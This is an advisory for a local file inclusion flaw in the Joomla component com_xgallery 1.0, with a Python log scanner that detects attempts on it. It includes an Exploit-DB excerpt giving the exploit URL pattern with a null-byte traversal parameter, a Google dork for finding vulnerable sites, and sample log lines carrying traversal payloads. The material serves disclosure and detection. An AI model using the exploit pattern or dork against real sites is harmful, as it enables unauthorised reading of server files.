Vendor: com_xgallery
By: KelvinX
CVSS: 5.5 (MEDIUM)
Vulnerability: Local File Inclusion
CWE: 22
Product Name: com_xgallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Platforms Tested:
2010

Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability

The Joomla component com_xgallery version 1.0 is vulnerable to local file inclusion. An attacker can exploit this by requesting the component's helpers/img.php script with a specially crafted file parameter, which lets them include arbitrary local files.

Mitigation:

Upgrade to the most recent version of the component.
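
Since the entry lists no patch for version 1.0, web server logs are a practical place to look for this request pattern. The following is an added example, not part of the original advisory or the component's code: it flags requests to helpers/img.php whose file parameter decodes to a null byte, a traversal segment or an absolute path. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter name come from the advisory; the rest is assumed.
TARGET = "/components/com_xgallery/helpers/img.php"
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Dec/2010:10:01:02 +0700] "GET /components/com_xgallery/helpers/img.php?file=thumbs/cat.jpg HTTP/1.1" 200 5120
203.0.113.9 - - [21/Dec/2010:10:02:11 +0700] "GET /site/components/com_xgallery/helpers/img.php?file=../../../../tmp/example.txt%00 HTTP/1.1" 200 1873
203.0.113.9 - - [21/Dec/2010:10:02:15 +0700] "GET /site/components/com_xgallery/helpers/img.php?file=%252e%252e%252fexample.txt%2500 HTTP/1.1" 200 2210
192.0.2.44 - - [21/Dec/2010:10:03:40 +0700] "GET /index.php?option=com_content&file=../x HTTP/1.1" 200 900
"""

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_reasons(file_value):
    """Return why a `file` value looks like an inclusion attempt ([] if clean)."""
    v = fully_decode(file_value).replace("\\", "/")
    reasons = []
    if "\x00" in v:
        reasons.append("null byte")
    if ".." in v.split("/"):
        reasons.append("path traversal")
    if v.startswith("/") or re.match(r"[A-Za-z]:/", v):
        reasons.append("absolute path")
    return reasons

def scan(log_text):
    """Return (client, reasons) for flagged requests to the vulnerable script."""
    hits = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        parts = urlsplit(m.group(2))
        if not fully_decode(parts.path).endswith(TARGET):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
            reasons = suspicious_reasons(value)
            if reasons:
                hits.append((m.group(1), reasons))
    return hits
```

Calling scan(SAMPLE_LOG) returns the two requests from 203.0.113.9, including the double-encoded one; the benign thumbnail request and the request to a different script are ignored.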

Exploit-DB raw data:

# Exploit Title: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 21-2010
# Location: HCM City, Vietnam

 ------------------------

# Application: com_xgallery
# Version: 1.0
# Vendor: http://www.optikool.com/documentation/xmovie-component
# Google Dorks: inurl:com_xgallery

------------------------

Exploit: http://127.0.0.1/[path]/components/com_xgallery/helpers/img.php?file=[LFI]%00

------------------------

# Solution: Upgrade to the most recent version